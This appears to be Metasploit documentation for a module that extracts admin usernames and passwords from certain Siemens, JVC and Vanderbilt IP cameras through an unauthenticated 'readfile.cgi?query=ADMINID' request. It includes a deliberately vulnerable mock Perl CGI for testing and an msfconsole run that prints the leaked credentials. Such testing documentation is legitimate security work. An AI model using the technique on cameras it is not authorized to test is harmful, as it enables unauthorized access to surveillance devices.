documentation/modules/auxiliary/gather/ipcamera_password_disclosure.md
SIEMENS IP-Camera (CVMS2025-IR + CCMS2025), JVC IP-Camera (VN-T216VPRU), and Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR) allow an unauthenticated user to disclose the username & password by requesting the javascript page 'readfile.cgi?query=ADMINID'. Siemens firmwares affected: x.2.2.1798, CxMS2025_V2458_SP1, x.2.2.1798, x.2.2.1235
This module has been verified against the mock vulnerable page listed below.
These instructions will create a cgi environment and a vulnerable perl application for exploitation. Kali rolling (2019.1) was utilized for this tutorial, with apache.
a2enmod cgidmkdir /var/www/html/cgi-binScriptAlias "/cgi-bin/" "/var/www/html/cgi-bin/" to /etc/apache2/sites-enabled/000-default.conf inside of the VirtualHost tags/var/www/html/cgi-bin/readfile.cgi:#!/usr/bin/perl
use CGI qw(:standard);
$query = new CGI;
print $query->header( -type=> "text/javascript"),
$query->import_names( 'Q' );
my $data = <<'DATA';
var Adm_ID="admin";
var Adm_Pass1="password";
var Language="en";
var Logoff_Time="0";
DATA
if ($Q::query == "ADMINID") {
print $data;
}
use auxiliary/gather/ipcamera_password_disclosureset rhosts [rhosts]runmsf > use auxiliary/gather/ipcamera_password_disclosure
msf auxiliary(gather/ipcamera_password_disclosure) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf auxiliary(gather/ipcamera_password_disclosure) > run
[+] Found: admin:password
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed